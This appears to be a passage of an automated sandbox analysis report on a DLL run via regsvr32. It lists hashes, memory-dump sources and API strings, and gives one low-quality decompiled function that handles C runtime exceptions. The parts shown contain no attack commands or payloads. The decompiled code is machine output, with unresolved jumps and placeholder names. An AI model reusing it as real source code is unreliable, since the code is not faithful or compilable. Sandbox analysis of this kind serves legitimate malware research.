                                                                                        • Opcode Fuzzy Hash: b64be2a8eca497eb38ff52dc13b3436bc691d1b4503f9f72973df8eece0bc5fb
                                                                                        • Instruction Fuzzy Hash: 4C910E31A1CA8685EBA0DB64E8543BE63E0F384784FA04126D6CD47AB9DF3FE545CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                                                        • API String ID: 2574300362-564504941
                                                                                        • Opcode ID: fee43fc66515416ac0980d72625433c0e8db806945977869f613c1f5f8def98f
                                                                                        • Instruction ID: 70a6d76ff3d3819b8955004bde04ce45998dc5e92ad36a3a08ed7dd3d00f33af
                                                                                        • Opcode Fuzzy Hash: fee43fc66515416ac0980d72625433c0e8db806945977869f613c1f5f8def98f
                                                                                        • Instruction Fuzzy Hash: F051A635A08A8286E7A09B19FC5476E73E4F784B51F609035DACE43A74DF7EE488CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWidewcsncnt
                                                                                        • String ID:
                                                                                        • API String ID: 641786319-0
                                                                                        • Opcode ID: dd68202ae9e70015e3243afc192c87c9af493ce1bfd3ef4005d4635320cae465
                                                                                        • Instruction ID: 27f88887327b6a70fd6681a1572ed994cc0fbf2c3fc8410d15a0bdfd36c78ba8
                                                                                        • Opcode Fuzzy Hash: dd68202ae9e70015e3243afc192c87c9af493ce1bfd3ef4005d4635320cae465
                                                                                        • Instruction Fuzzy Hash: 7402F432A0CEC5C1D6A09B15E8903AEB7A0F7857A5F604226E6DD47BE9DF3ED445CB00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 20%
                                                                                        			E000007FE7FEF9D340B0(void* __ecx, void* __edi, void* __esi, void* __esp, void* __eflags, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, void* _a16, long long _a24, void* _a32, signed int* _a40, signed int _a48, signed int _a56, long long _a64) {
                                                                                        				long long _v24;
                                                                                        				long long _v32;
                                                                                        				char _v56;
                                                                                        				long long _v64;
                                                                                        				long long _v72;
                                                                                        				char _v80;
                                                                                        				void* _v88;
                                                                                        				void* _v96;
                                                                                        				intOrPtr _v104;
                                                                                        				void* _v112;
                                                                                        				intOrPtr _v120;
                                                                                        				void* _v128;
                                                                                        				char _v132;
                                                                                        				char _v136;
                                                                                        				long long _v144;
                                                                                        				signed int _v152;
                                                                                        				char _v160;
                                                                                        				signed char _v164;
                                                                                        				signed int _v168;
                                                                                        				char _v176;
                                                                                        				char _v184;
                                                                                        				long long _v192;
                                                                                        				signed char _v200;
                                                                                        				long long _v208;
                                                                                        				signed int _v216;
                                                                                        				signed int _v224;
                                                                                        				long long _v232;
                                                                                        				void* _t222;
                                                                                        				void* _t244;
                                                                                        				void* _t295;
                                                                                        				long long _t302;
                                                                                        				long long _t303;
                                                                                        				intOrPtr _t311;
                                                                                        				long long _t312;
                                                                                        				long long _t321;
                                                                                        				intOrPtr _t325;
                                                                                        				long long _t329;
                                                                                        				long long _t330;
                                                                                        				long long _t332;
                                                                                        
                                                                                        				_t295 = __rax;
                                                                                        				_a32 = __r9;
                                                                                        				_a24 = __r8;
                                                                                        				_a16 = __rdx;
                                                                                        				_a8 = __rcx;
                                                                                        				_v164 = 0;
                                                                                        				_v152 = 0;
                                                                                        				_v168 = E000007FE7FEF9D33B40(_a40, _a32);
                                                                                        				E000007FE7FEF9D2E500(_a16, _a32, _a40,  &_v160);
                                                                                        				if (_v168 - E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40) <= 0) goto 0xf9d34176;
                                                                                        				r9d = _v168;
                                                                                        				E000007FE7FEF9D33BD0(_t217,  &_v160, _a32, _a40);
                                                                                        				r9d = _v168;
                                                                                        				E000007FE7FEF9D33C00(_v168 - E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40), _t295, _a16, _a32, _a40);
                                                                                        				goto 0xf9d34197;
                                                                                        				_v168 = E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40);
                                                                                        				if (_v168 - 0xffffffff < 0) goto 0xf9d341b1;
                                                                                        				if (_v168 - _a40[1] >= 0) goto 0xf9d341b1;
                                                                                        				goto 0xf9d341b6;
                                                                                        				_t222 = E000007FE7FEF9D2CF80(_a40);
                                                                                        				if ( *_a8 != 0xe06d7363) goto 0xf9d34398;
                                                                                        				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d34398;
                                                                                        				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d34213;
                                                                                        				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d34213;
                                                                                        				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d34398;
                                                                                        				_t302 = _a8;
                                                                                        				if ( *((long long*)(_t302 + 0x30)) != 0) goto 0xf9d34398;
                                                                                        				0xf9d24000();
                                                                                        				if ( *((long long*)(_t302 + 0xf0)) != 0) goto 0xf9d3423a;
                                                                                        				goto 0xf9d34862;
                                                                                        				0xf9d24000();
                                                                                        				_t303 =  *((intOrPtr*)(_t302 + 0xf0));
                                                                                        				_a8 = _t303;
                                                                                        				0xf9d24000();
                                                                                        				_a24 =  *((intOrPtr*)(_t303 + 0xf8));
                                                                                        				_v164 = 1;
                                                                                        				E000007FE7FEF9D2E6E0(_t222, _a8,  *((intOrPtr*)(_a8 + 0x38)));
                                                                                        				if (E000007FE7FEF9D3D2C0(1, _a8) == 0) goto 0xf9d34290;
                                                                                        				goto 0xf9d34295;
                                                                                        				E000007FE7FEF9D2CF80(_a8);
                                                                                        				if ( *_a8 != 0xe06d7363) goto 0xf9d342fa;
                                                                                        				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d342fa;
                                                                                        				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d342e6;
                                                                                        				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d342e6;
                                                                                        				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d342fa;
                                                                                        				_t311 = _a8;
                                                                                        				if ( *((long long*)(_t311 + 0x30)) != 0) goto 0xf9d342fa;
                                                                                        				E000007FE7FEF9D2CF80(_t311);
                                                                                        				0xf9d24000();
                                                                                        				if ( *((long long*)(_t311 + 0x108)) == 0) goto 0xf9d34398;
                                                                                        				0xf9d24000();
                                                                                        				_t312 =  *((intOrPtr*)(_t311 + 0x108));
                                                                                        				_v144 = _t312;
                                                                                        				0xf9d24000();
                                                                                        				 *((long long*)(_t312 + 0x108)) = 0;
                                                                                        				if ((E000007FE7FEF9D35BB0(_t312, _a8, _v144) & 0x000000ff) == 0) goto 0xf9d34349;
                                                                                        				goto 0xf9d34398;
                                                                                        				if ((E000007FE7FEF9D35CC0(_v144) & 0x000000ff) == 0) goto 0xf9d34393;
                                                                                        				E000007FE7FEF9D35AB0(1, _a8);
                                                                                        				E000007FE7FEF9D34870( &_v56, "bad exception");
                                                                                        				E000007FE7FEF9D3D320(__edi, __esi, __esp,  &_v56, 0xf9d4a180);
                                                                                        				goto 0xf9d34398;
                                                                                        				E000007FE7FEF9D2CF50(_t312);
                                                                                        				if ( *_a8 != 0xe06d7363) goto 0xf9d347d9;
                                                                                        				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d347d9;
                                                                                        				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d343f5;
                                                                                        				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d343f5;
                                                                                        				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d347d9;
                                                                                        				if (_a40[3] <= 0) goto 0xf9d3466c;
                                                                                        				_v216 = _a32;
                                                                                        				_v224 =  &_v132;
                                                                                        				_t321 =  &_v136;
                                                                                        				_v232 = _t321;
                                                                                        				r9d = _v168;
                                                                                        				r8d = _a56;
                                                                                        				E000007FE7FEF9D2EA30(_a16, _a40);
                                                                                        				_v128 = _t321;
                                                                                        				goto 0xf9d3447e;
                                                                                        				_v136 = _v136 + 1;
                                                                                        				_v128 = _v128 + 0x14;
                                                                                        				if (_v136 - _v132 >= 0) goto 0xf9d3466c;
                                                                                        				if ( *_v128 - _v168 > 0) goto 0xf9d344b3;
                                                                                        				_t325 = _v128;
                                                                                        				if (_v168 -  *((intOrPtr*)(_t325 + 4)) <= 0) goto 0xf9d344b5;
                                                                                        				goto 0xf9d3445a;
                                                                                        				E000007FE7FEF9D2E680( *((intOrPtr*)(_t325 + 4)), _t325);
                                                                                        				_v112 = _t325 +  *((intOrPtr*)(_v128 + 0x10));
                                                                                        				_v120 =  *((intOrPtr*)(_v128 + 0xc));
                                                                                        				_v120 = _v120 - 1;
                                                                                        				_t329 = _v112 + 0x14;
                                                                                        				_v112 = _t329;
                                                                                        				if (_v120 <= 0) goto 0xf9d34667;
                                                                                        				_t244 = E000007FE7FEF9D2E6A0(_v120 - 1, _t329);
                                                                                        				_t330 = _t329 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc)) + 4;
                                                                                        				_v96 = _t330;
                                                                                        				E000007FE7FEF9D2E6A0(_t244, _t330);
                                                                                        				_v104 =  *((intOrPtr*)(_t330 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc))));
                                                                                        				goto 0xf9d3457e;
                                                                                        				_v104 = _v104 - 1;
                                                                                        				_t332 = _v96 + 4;
                                                                                        				_v96 = _t332;
                                                                                        				if (_v104 <= 0) goto 0xf9d34662;
                                                                                        				E000007FE7FEF9D2E6A0(_v104 - 1, _t332);
                                                                                        				_v88 = _t332 +  *_v96;
                                                                                        				if (E000007FE7FEF9D34CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))) != 0) goto 0xf9d345ce;
                                                                                        				goto 0xf9d3455a;
                                                                                        				_v152 = 1;
                                                                                        				_v176 = _a48 & 0x000000ff;
                                                                                        				_v184 = _v164 & 0x000000ff;
                                                                                        				_v192 = _a64;
                                                                                        				_v200 = _a56;
                                                                                        				_v208 = _v128;
                                                                                        				_v216 = _v88;
                                                                                        				_v224 = _v112;
                                                                                        				_v232 = _a40;
                                                                                        				E000007FE7FEF9D35180(__edi, __esi, __esp, E000007FE7FEF9D34CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))), _a8, _a16, _a24, _a32);
                                                                                        				goto 0xf9d34667;
                                                                                        				goto 0xf9d3455a;
                                                                                        				goto L1;
                                                                                        				goto 0xf9d3445a;
                                                                                        				__eax = _v152 & 0x000000ff;
                                                                                        				__eflags = _v152 & 0x000000ff;
                                                                                        				if ((_v152 & 0x000000ff) != 0) goto 0xf9d347d7;
                                                                                        				__rax = _a40;
                                                                                        				__eax =  *_a40;
                                                                                        				__eax =  *_a40 & 0x1fffffff;
                                                                                        				__eflags = __eax - 0x19930521;
                                                                                        				if (__eax - 0x19930521 < 0) goto 0xf9d347d7;
                                                                                        				__rax = _a40;
                                                                                        				__eflags =  *(__rax + 0x20);
                                                                                        				if ( *(__rax + 0x20) == 0) goto 0xf9d346bf;
                                                                                        				__eax = E000007FE7FEF9D2E680(__eax, __rax);
                                                                                        				_a40 = _a40[8];
                                                                                        				_v32 = __rax;
                                                                                        				goto 0xf9d346cb;
                                                                                        				_v32 = 0;
                                                                                        				__eflags = _v32;
                                                                                        				if (_v32 == 0) goto 0xf9d347d7;
                                                                                        				__rax = _a40;
                                                                                        				__eflags =  *(__rax + 0x20);
                                                                                        				if ( *(__rax + 0x20) == 0) goto 0xf9d34706;
                                                                                        				__eax = E000007FE7FEF9D2E680(__eax, __rax);
                                                                                        				_a40 = _a40[8];
                                                                                        				__rax = __rax + _a40[8];
                                                                                        				_v24 = __rax;
                                                                                        				goto 0xf9d34712;
                                                                                        				_v24 = 0;
                                                                                        				__rdx = _v24;
                                                                                        				__rcx = _a8;
                                                                                        				E000007FE7FEF9D35BB0(__rax, _a8, _v24) = __al & 0x000000ff;
                                                                                        				__eflags = __al & 0x000000ff;
                                                                                        				if ((__al & 0x000000ff) != 0) goto 0xf9d347d7;
                                                                                        				__rax = _a16;
                                                                                        				_v64 = _a16;
                                                                                        				__r9 =  &_v80;
                                                                                        				__r8 = _a40;
                                                                                        				__rdx = _a32;
                                                                                        				__rcx = _a16;
                                                                                        				__eax = E000007FE7FEF9D2E500(_a16, _a32, _a40,  &_v80);
                                                                                        				_v64 = __rax;
                                                                                        				_v72 = 0;
                                                                                        				__eax = _a48 & 0x000000ff;
                                                                                        				_v200 = __al;
                                                                                        				__rax = _a32;
                                                                                        				_v208 = _a32;
                                                                                        				__rax = _a40;
                                                                                        				_v216 = _a40;
                                                                                        				_v224 = 0xffffffff;
                                                                                        				_v232 = 0;
                                                                                        				__r9 = _v64;
                                                                                        				__r8 = _a24;
                                                                                        				__rdx = _a8;
                                                                                        				__rcx = _a16;
                                                                                        				__eax = E000007FE7FEF9D2EDC0(__edi, __esi, __esp, _a16, _a8, _a24, _v64);
                                                                                        				goto 0xf9d3484c;
                                                                                        				__rax = _a40;
                                                                                        				__eflags =  *(__rax + 0xc);
                                                                                        				if ( *(__rax + 0xc) <= 0) goto 0xf9d3484c;
                                                                                        				__eax = _a48 & 0x000000ff;
                                                                                        				__eflags = _a48 & 0x000000ff;
                                                                                        				if ((_a48 & 0x000000ff) != 0) goto 0xf9d34847;
                                                                                        				__rax = _a64;
                                                                                        				_v208 = _a64;
                                                                                        				__eax = _a56;
                                                                                        				_v216 = _a56;
                                                                                        				__eax = _v168;
                                                                                        				_v224 = _v168;
                                                                                        				__rax = _a40;
                                                                                        				_v232 = _a40;
                                                                                        				__r9 = _a32;
                                                                                        				__r8 = _a24;
                                                                                        				__rdx = _a16;
                                                                                        				__rcx = _a8;
                                                                                        				__eax = E000007FE7FEF9D34960(__ecx, _a8, _a16, _a24, _a32);
                                                                                        				goto 0xf9d3484c;
                                                                                        				__eax = E000007FE7FEF9D2CF50(__rax);
                                                                                        				0xf9d24000();
                                                                                        				__eflags =  *((long long*)(__rax + 0x108));
                                                                                        				if ( *((long long*)(__rax + 0x108)) != 0) goto 0xf9d3485d;
                                                                                        				goto 0xf9d34862;
                                                                                        				return E000007FE7FEF9D2CF80(__rax);
                                                                                        			}










































                                                                                        0x7fef9d340b0
                                                                                        0x7fef9d340b0
                                                                                        0x7fef9d340b5
                                                                                        0x7fef9d340ba
                                                                                        0x7fef9d340bf
                                                                                        0x7fef9d340cb
                                                                                        0x7fef9d340d0
                                                                                        0x7fef9d340ea
                                                                                        0x7fef9d3410b
                                                                                        0x7fef9d34131
                                                                                        0x7fef9d34133
                                                                                        0x7fef9d3414d
                                                                                        0x7fef9d34152
                                                                                        0x7fef9d3416f
                                                                                        0x7fef9d34174
                                                                                        0x7fef9d34193
                                                                                        0x7fef9d3419c
                                                                                        0x7fef9d341ad
                                                                                        0x7fef9d341af
                                                                                        0x7fef9d341b1
                                                                                        0x7fef9d341c4
                                                                                        0x7fef9d341d6
                                                                                        0x7fef9d341eb
                                                                                        0x7fef9d341fc
                                                                                        0x7fef9d3420d
                                                                                        0x7fef9d34213
                                                                                        0x7fef9d34220
                                                                                        0x7fef9d34226
                                                                                        0x7fef9d34233
                                                                                        0x7fef9d34235
                                                                                        0x7fef9d3423a
                                                                                        0x7fef9d3423f
                                                                                        0x7fef9d34246
                                                                                        0x7fef9d3424e
                                                                                        0x7fef9d3425a
                                                                                        0x7fef9d34262
                                                                                        0x7fef9d34273
                                                                                        0x7fef9d3428c
                                                                                        0x7fef9d3428e
                                                                                        0x7fef9d34290
                                                                                        0x7fef9d342a3
                                                                                        0x7fef9d342b1
                                                                                        0x7fef9d342c2
                                                                                        0x7fef9d342d3
                                                                                        0x7fef9d342e4
                                                                                        0x7fef9d342e6
                                                                                        0x7fef9d342f3
                                                                                        0x7fef9d342f5
                                                                                        0x7fef9d342fa
                                                                                        0x7fef9d34307
                                                                                        0x7fef9d3430d
                                                                                        0x7fef9d34312
                                                                                        0x7fef9d34319
                                                                                        0x7fef9d3431e
                                                                                        0x7fef9d34323
                                                                                        0x7fef9d34345
                                                                                        0x7fef9d34347
                                                                                        0x7fef9d34358
                                                                                        0x7fef9d34364
                                                                                        0x7fef9d34378
                                                                                        0x7fef9d3438c
                                                                                        0x7fef9d34391
                                                                                        0x7fef9d34393
                                                                                        0x7fef9d343a6
                                                                                        0x7fef9d343b8
                                                                                        0x7fef9d343cd
                                                                                        0x7fef9d343de
                                                                                        0x7fef9d343ef
                                                                                        0x7fef9d34401
                                                                                        0x7fef9d3440f
                                                                                        0x7fef9d3441c
                                                                                        0x7fef9d34421
                                                                                        0x7fef9d34429
                                                                                        0x7fef9d3442e
                                                                                        0x7fef9d34433
                                                                                        0x7fef9d3444b
                                                                                        0x7fef9d34450
                                                                                        0x7fef9d34458
                                                                                        0x7fef9d34463
                                                                                        0x7fef9d34476
                                                                                        0x7fef9d3448c
                                                                                        0x7fef9d344a0
                                                                                        0x7fef9d344a2
                                                                                        0x7fef9d344b1
                                                                                        0x7fef9d344b3
                                                                                        0x7fef9d344b5
                                                                                        0x7fef9d344c9
                                                                                        0x7fef9d344dc
                                                                                        0x7fef9d344ee
                                                                                        0x7fef9d344fd
                                                                                        0x7fef9d34501
                                                                                        0x7fef9d34511
                                                                                        0x7fef9d34517
                                                                                        0x7fef9d3452c
                                                                                        0x7fef9d34531
                                                                                        0x7fef9d34539
                                                                                        0x7fef9d34551
                                                                                        0x7fef9d34558
                                                                                        0x7fef9d34563
                                                                                        0x7fef9d34572
                                                                                        0x7fef9d34576
                                                                                        0x7fef9d34586
                                                                                        0x7fef9d3458c
                                                                                        0x7fef9d3459f
                                                                                        0x7fef9d345ca
                                                                                        0x7fef9d345cc
                                                                                        0x7fef9d345ce
                                                                                        0x7fef9d345db
                                                                                        0x7fef9d345e4
                                                                                        0x7fef9d345f0
                                                                                        0x7fef9d345fc
                                                                                        0x7fef9d34608
                                                                                        0x7fef9d34615
                                                                                        0x7fef9d34622
                                                                                        0x7fef9d3462f
                                                                                        0x7fef9d34654
                                                                                        0x7fef9d3465b
                                                                                        0x7fef9d3465d
                                                                                        0x7fef9d34662
                                                                                        0x7fef9d34667
                                                                                        0x7fef9d3466c
                                                                                        0x7fef9d34671
                                                                                        0x7fef9d34673
                                                                                        0x7fef9d34679
                                                                                        0x7fef9d34681
                                                                                        0x7fef9d34683
                                                                                        0x7fef9d34688
                                                                                        0x7fef9d3468d
                                                                                        0x7fef9d34693
                                                                                        0x7fef9d3469b
                                                                                        0x7fef9d3469f
                                                                                        0x7fef9d346a1
                                                                                        0x7fef9d346ae
                                                                                        0x7fef9d346b5
                                                                                        0x7fef9d346bd
                                                                                        0x7fef9d346bf
                                                                                        0x7fef9d346cb
                                                                                        0x7fef9d346d4
                                                                                        0x7fef9d346da
                                                                                        0x7fef9d346e2
                                                                                        0x7fef9d346e6
                                                                                        0x7fef9d346e8
                                                                                        0x7fef9d346f5
                                                                                        0x7fef9d346f9
                                                                                        0x7fef9d346fc
                                                                                        0x7fef9d34704
                                                                                        0x7fef9d34706
                                                                                        0x7fef9d34712
                                                                                        0x7fef9d3471a
                                                                                        0x7fef9d34727
                                                                                        0x7fef9d3472a
                                                                                        0x7fef9d3472c
                                                                                        0x7fef9d34732
                                                                                        0x7fef9d3473a
                                                                                        0x7fef9d34742
                                                                                        0x7fef9d3474a
                                                                                        0x7fef9d34752
                                                                                        0x7fef9d3475a
                                                                                        0x7fef9d34762
                                                                                        0x7fef9d34767
                                                                                        0x7fef9d3476f
                                                                                        0x7fef9d3477b
                                                                                        0x7fef9d34783
                                                                                        0x7fef9d34787
                                                                                        0x7fef9d3478f
                                                                                        0x7fef9d34794
                                                                                        0x7fef9d3479c
                                                                                        0x7fef9d347a1
                                                                                        0x7fef9d347a9
                                                                                        0x7fef9d347b2
                                                                                        0x7fef9d347ba
                                                                                        0x7fef9d347c2
                                                                                        0x7fef9d347ca
                                                                                        0x7fef9d347d2
                                                                                        0x7fef9d347d7
                                                                                        0x7fef9d347d9
                                                                                        0x7fef9d347e1
                                                                                        0x7fef9d347e5
                                                                                        0x7fef9d347e7
                                                                                        0x7fef9d347ef
                                                                                        0x7fef9d347f1
                                                                                        0x7fef9d347f3
                                                                                        0x7fef9d347fb
                                                                                        0x7fef9d34800
                                                                                        0x7fef9d34807
                                                                                        0x7fef9d3480b
                                                                                        0x7fef9d3480f
                                                                                        0x7fef9d34813
                                                                                        0x7fef9d3481b
                                                                                        0x7fef9d34820
                                                                                        0x7fef9d34828
                                                                                        0x7fef9d34830
                                                                                        0x7fef9d34838
                                                                                        0x7fef9d34840
                                                                                        0x7fef9d34845
                                                                                        0x7fef9d34847
                                                                                        0x7fef9d3484c
                                                                                        0x7fef9d34851
                                                                                        0x7fef9d34859
                                                                                        0x7fef9d3485b
                                                                                        0x7fef9d34869

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlockStateUnwind_inconsistency$ControlFromterminate$BaseDecodeEntryExceptionFunctionImageLookupPointerRaiseReadThrowValidatestd::bad_exception::bad_exceptionstd::exception::exceptiontype_info::operator==
                                                                                        • String ID: bad exception$csm$csm$csm
                                                                                        • API String ID: 3498492519-820278400
                                                                                        • Opcode ID: e25f8e0578bfe9456fb08d8cd94b15df4ac81620a0b1491193f50dcc2ec7c96e
                                                                                        • Instruction ID: b93d13205fcb5bf4744c4f5868d42f2397ba004b3dd065f5f3bbc86f0087c528
                                                                                        • Opcode Fuzzy Hash: e25f8e0578bfe9456fb08d8cd94b15df4ac81620a0b1491193f50dcc2ec7c96e
                                                                                        • Instruction Fuzzy Hash: C412D436A0DBC585DAB19B15E8407EEB7A0F7C8791F604126DACD87BA9CB7DD440CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$_invalid_parameter$UpdateUpdate::~_
                                                                                        • String ID: ( (_Stream->_flag & _IOSTRG) || ( fn = _fileno(_Stream), ( (_textmode_safe(fn) == __IOINFO_TM_ANSI) && !_tm_unicode_safe(fn))))$("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 4023976971-2293733425
                                                                                        • Opcode ID: 418e75de3b5502e14211c5140618c90997ad4f56b588356074338880c32fc633
                                                                                        • Instruction ID: fa666a0989dbdcd631dba14fdf712f3fd1171dc1b338b0fed7bc0ada6eb2a45d
                                                                                        • Opcode Fuzzy Hash: 418e75de3b5502e14211c5140618c90997ad4f56b588356074338880c32fc633
                                                                                        • Instruction Fuzzy Hash: 8B024A72A0D7C28AE7B09B24E8447BEB7E4F384345F604126D6CC46AA9DB7EE545CF40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                                        • String ID: _mbstowcs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$s != NULL
                                                                                        • API String ID: 530996419-3695252689
                                                                                        • Opcode ID: 1f2dbb67bc1f08ab970a747115c78d639e8f09549dde5f83a97e8aad344e67fd
                                                                                        • Instruction ID: dd73616ddae2cae72d7b30165dff30affe8ff5e8ed842a8499c58fb9266416ee
                                                                                        • Opcode Fuzzy Hash: 1f2dbb67bc1f08ab970a747115c78d639e8f09549dde5f83a97e8aad344e67fd
                                                                                        • Instruction Fuzzy Hash: FAD11832A1CBC585E7A09B15E8407AEB7A0F784794F605626E6DE83BE9DF3DD444CB00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                        • String ID: "$"$("Buffer too small", 0)$_wctomb_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wctomb.c$sizeInBytes <= INT_MAX$sizeInBytes > 0
                                                                                        • API String ID: 2192614184-1854130327
                                                                                        • Opcode ID: aa152b01a59852e776b44a3c5c58d1ae4cb5e6b33e85f9a53a8f9bb433ba7f1c
                                                                                        • Instruction ID: 7076a95ac8019ae0c7cbf4bc144243c7f76c7d2257b38824bc8c592ccc79079f
                                                                                        • Opcode Fuzzy Hash: aa152b01a59852e776b44a3c5c58d1ae4cb5e6b33e85f9a53a8f9bb433ba7f1c
                                                                                        • Instruction Fuzzy Hash: 33C10932A0D68286E7B09B54E8547BEB7E0F784744F604126E6CD87AE9CB7EE444CF41
